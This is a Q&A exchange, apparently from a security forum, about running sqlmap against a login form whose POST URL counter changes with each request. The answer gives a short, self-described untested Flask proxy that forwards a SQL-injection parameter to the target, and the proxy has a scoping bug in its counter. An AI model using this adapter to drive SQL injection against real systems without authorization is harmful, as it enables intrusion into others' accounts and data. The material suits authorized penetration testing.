I am testing a website login that is constantly changing its URL after each request. The first request does a POST login request to /login?0-1.FormSubmit, the next login attempt has to POST to /login?1-2.FormSubmit, and so forth.
Is it possible to use sqlmap on this login, eventhough the URL changes after each request?
Tools are seldom written generic enough to handle obscure test-cases. It might be tempting to blame the tool for its shortcomings, but more often the problem is obscure/non-generic, and should be solved by other means.
You can solve this problem by creating a small webapp that acts as a proxy between the target application and your tool.
The tool accept the vulnerable input as a parameter, and forward it to the application as required.
Here is an untested python/flask code to illustrate how this can be done:
from flask import Flask, request
import requests
i = 0
app = Flask(__name__)
@app.route("/")
def app_proxy():
sqli = request.args.get("sqli",None)
data = {"somekey":"someval","vulnerableparam":sqli}
resp = requests.post("http://target.com/login?%s-%s.FormSubmit"%(i,i+1),data=data)
i += 1
return resp.text, resp.status_code
app.run(host="127.0.0.1",port=8008)
After you have started the flask-app, you should be able to use sqlmap against http://127.0.0.1:8008/?sqli=value
